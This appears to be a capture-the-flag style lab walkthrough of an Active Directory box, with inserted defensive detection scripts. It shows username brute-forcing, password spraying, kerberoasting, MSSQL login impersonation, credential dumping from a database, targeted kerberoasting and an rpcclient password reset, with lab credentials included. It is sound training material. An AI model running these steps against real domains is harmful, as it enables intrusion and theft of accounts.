# Hokkaido

Using kerbrute for bruteforcing usernames:

```bash
kerbrute userenum --dc 192.168.212.40 -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade
```

We get usernames:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fed2f04f55f19f7ae09139ce562b5c48d8858dbd%2F5f70acd0ec3e0f5ea47e94be623718a2.png?alt=media)

Now bruteforcing passwords with the usernames:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-515139b971b04c7668be93f57bc2b3ab0844a515%2F892d14bebe8df28e5bb157e7d442070c.png?alt=media)

Now we can try kerberoasting with this account:

```bash
GetUserSPNs.py hokkaido-aerospace.com/info:info -request
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cd6471f9fef36b6b531484979ea9642450c7ef05%2Fc6b6f7d617322665a13df8e46da11fd2.png?alt=media)

We get two hashes but they are uncrackable:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d2031b8766c00049e5959d56d2bd2b459104f133%2Fba75fa0c62cda02890227e8ecf6f9e64.png?alt=media)

Now checking the SYSVOL share for scripts:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0a24b6107b1c7ce8b923097e5157f8f9eeefa8d3%2F2ae5d9b5494df825d90b29b3a54eb003.png?alt=media)

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c29d4889bf898133e8642fcba784120ab3a98b74%2F69014b0a052e318f497397e0867c1c21.png?alt=media)

Now we get a password, so spraying it:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-9e2ebbe93cc414503c6b58a79596b46c6567e098%2F848e04d85b33bb9b34ab2917fd15d1af.png?alt=media)

Now using the discovery user we can log in to MSSQL:

```bash
mssqlclient.py -windows-auth -dc-ip 192.168.212.40 hokkaido-aerospace.com/discovery:'Start123!'@192.168.212.40
```
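From the defender's side, the username enumeration, password guessing and password spray steps above all show up on the domain controller as one source failing against many accounts. The following is an added example, not part of the original writeup: it assumes Kerberos failure auditing is enabled so that events 4768/4771 are logged, and the one-line export format, account names and IP addresses are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos result codes as logged in the Status field of events 4768 / 4771
PRINCIPAL_UNKNOWN = "0x6"   # account name does not exist (enumeration signal)
PREAUTH_FAILED = "0x18"     # wrong password (guessing / spraying signal)
KIND = {PRINCIPAL_UNKNOWN: "user-enumeration", PREAUTH_FAILED: "password-spray"}

# Constructed sample export: "<timestamp> key=value ..." (not real log data)
SAMPLE = """\
2024-05-01T10:00:00 EventID=4768 TargetUserName=aaron Status=0x6 IpAddress=::ffff:10.0.0.50
2024-05-01T10:00:01 EventID=4768 TargetUserName=abby Status=0x6 IpAddress=::ffff:10.0.0.50
2024-05-01T10:00:02 EventID=4768 TargetUserName=adam Status=0x6 IpAddress=::ffff:10.0.0.50
2024-05-01T10:02:00 EventID=4771 TargetUserName=alice Status=0x18 IpAddress=::ffff:10.0.0.50
2024-05-01T10:02:01 EventID=4771 TargetUserName=bob Status=0x18 IpAddress=::ffff:10.0.0.50
2024-05-01T10:02:02 EventID=4771 TargetUserName=carol Status=0x18 IpAddress=::ffff:10.0.0.50
2024-05-01T10:03:00 EventID=4771 TargetUserName=dave Status=0x18 IpAddress=::ffff:10.0.0.77
2024-05-01T10:03:05 EventID=4771 TargetUserName=dave Status=0x18 IpAddress=::ffff:10.0.0.77
2024-05-01T10:03:09 EventID=4771 TargetUserName=dave Status=0x18 IpAddress=::ffff:10.0.0.77
""".splitlines()

def parse(line):
    ts, *pairs = line.split()
    ev = dict(p.split("=", 1) for p in pairs)
    ev["time"] = datetime.fromisoformat(ts)
    ev["IpAddress"] = ev["IpAddress"].replace("::ffff:", "")  # IPv4-mapped form
    return ev

def detect(lines, window=timedelta(minutes=5), min_users=3):
    """Return {(source_ip, kind): peak distinct accounts failed within window}."""
    recent = defaultdict(list)   # (ip, status) -> [(time, user)] inside the window
    alerts = {}
    for ev in sorted(map(parse, lines), key=lambda e: e["time"]):
        if ev["EventID"] not in ("4768", "4771") or ev["Status"] not in KIND:
            continue
        key = (ev["IpAddress"], ev["Status"])
        recent[key].append((ev["time"], ev["TargetUserName"].lower()))
        recent[key] = [(t, u) for t, u in recent[key] if ev["time"] - t <= window]
        users = {u for _, u in recent[key]}
        if len(users) >= min_users:   # one source, many accounts: not a typo
            alert = (ev["IpAddress"], KIND[ev["Status"]])
            alerts[alert] = max(alerts.get(alert, 0), len(users))
    return alerts

if __name__ == "__main__":
    for (ip, kind), n in detect(SAMPLE).items():
        print(f"{kind}: {ip} failed against {n} distinct accounts")
```

The single user who mistypes a password three times (10.0.0.77 in the sample) is not flagged, because the check counts distinct accounts per source rather than raw failures.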

Now checking for impersonation:

```sql
SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-255e71d6a8da20cf0f1de0d256c4dae76acda6a9%2F244d7632d9f665459f905bdba65f705d.png?alt=media)

Now to impersonate:

```sql
EXECUTE AS LOGIN = 'hrappdb-reader'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');
```

Now checking:

```sql
SELECT SYSTEM_USER
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-69f2061b025fcae12321555de6087bf1267937d3%2F665f7d64150e1c79672f50646d82414e.png?alt=media)

Now checking databases:

```sql
SELECT name FROM master.dbo.sysdatabases
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-88338bd6381bf8ce96994b0f369dbe308060ebe3%2Ff17153e53b0832857d718d981b897895.png?alt=media)

Checking all tables:

```sql
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-335b3137aebf06c7b4d1c7bf7d0b9e0387e794d1%2Fc1c0f18677ff89cdd6765abc75db208a.png?alt=media)

```sql
SELECT * FROM sysauth;
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-4c67805de37f871c470d3b218c2974a55e460e90%2Ff0fbf2c986e1b7b81d0e09c0c317caf3.png?alt=media)

Now with the creds we can run BloodHound:

```bash
nxc ldap 192.168.212.40 -u hrapp-service -p 'Untimed$Runny' --bloodhound --collection All -ns 192.168.212.40
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b5408dc1ace33005ec3ed4aae88dd2de83e51e02%2Fe3a1b6f73fdbb9a5e8816038f6a9c8d0.png?alt=media)

Checking outbound transitive object control, we have generic write over hazel. Doing a targeted kerberoast:

```bash
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7f1a623ef56a2cc0e251a555a9ca4eef7c9e06b7%2Fbd16e3763c8d2fddfa32c5379974e530.png?alt=media)

Only hazel's hash gets cracked.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2447cf6c2ab96c85f1cd1f043f7f5495a28a1612%2F20a92c73113e174b45f4b6b162c83d10.png?alt=media)
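A targeted kerberoast relies on write access to a user object: an SPN is set on the account, a service ticket is requested, and the SPN is removed again, which leaves a short-lived `servicePrincipalName` change in the directory audit trail. The following is an added example, not part of the original writeup, that correlates those events; it assumes Directory Service Changes auditing (event 5136) and Kerberos service ticket auditing (event 4769) are enabled, and all account names, DNs and SPN values are constructed.

```python
from datetime import datetime, timedelta

ADDED, DELETED = "%%14674", "%%14675"   # 5136 OperationType: value added / deleted

def ts(s):
    return datetime.fromisoformat(s)

def spn_event(time, subject, dn, spn, op):
    """Build a constructed 5136 record for a servicePrincipalName change."""
    return {"EventID": 5136, "time": ts(time), "SubjectUserName": subject, "ObjectDN": dn,
            "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": spn,
            "OperationType": op}

# Constructed sample events (not real log data)
JANE = "CN=Jane Doe,CN=Users,DC=example,DC=local"
EVENTS = [
    spn_event("2024-05-01T11:00:00", "svc-app", JANE, "host/constructed-spn", ADDED),
    {"EventID": 4769, "time": ts("2024-05-01T11:00:01"), "ServiceName": "jane.doe",
     "TargetUserName": "svc-app@EXAMPLE.LOCAL", "TicketEncryptionType": "0x17"},
    spn_event("2024-05-01T11:00:02", "svc-app", JANE, "host/constructed-spn", DELETED),
    # Legitimate change: an admin registers an SPN and leaves it in place
    spn_event("2024-05-01T12:00:00", "dbadmin", "CN=svc-sql,CN=Users,DC=example,DC=local",
              "MSSQLSvc/sql01.example.local:1433", ADDED),
]

def transient_spn_writes(events, max_gap=timedelta(minutes=10)):
    """Find SPNs one subject added and deleted again within max_gap, plus the
    service tickets (4769) that subject requested in between."""
    events = sorted(events, key=lambda e: e["time"])
    pending, findings = {}, []   # pending: (subject, dn, spn) -> time added
    for ev in events:
        if ev["EventID"] != 5136 or ev["AttributeLDAPDisplayName"].lower() != "serviceprincipalname":
            continue
        key = (ev["SubjectUserName"].lower(), ev["ObjectDN"].lower(), ev["AttributeValue"].lower())
        if ev["OperationType"] == ADDED:
            pending[key] = ev["time"]
        elif ev["OperationType"] == DELETED and key in pending:
            added = pending.pop(key)
            if ev["time"] - added <= max_gap:
                tickets = [e["ServiceName"] for e in events
                           if e["EventID"] == 4769 and added <= e["time"] <= ev["time"]
                           and e["TargetUserName"].split("@")[0].lower() == key[0]]
                findings.append({"subject": key[0], "object": ev["ObjectDN"],
                                 "spn": ev["AttributeValue"], "tickets": tickets})
    return findings

if __name__ == "__main__":
    print(transient_spn_writes(EVENTS))
```

The durable fix is on the ACL side: remove the write permission over the user object that makes the SPN change possible in the first place.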

We belong to Tier2-Admins and we have GenericWrite access over Administrators:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dfbb8be96f821a2ae8ffda79350a57362dad6caa%2Fca47130d083b1010f9b37833b4089355.png?alt=media)

But it doesn't work for some reason:

```bash
rpcclient //192.168.94.135 -U hokkaido-aerospace.com/hazel.green%haze1988c
```

```
rpcclient $> setuserinfo2 MOLLY.SMITH 23 'Start123!'
```
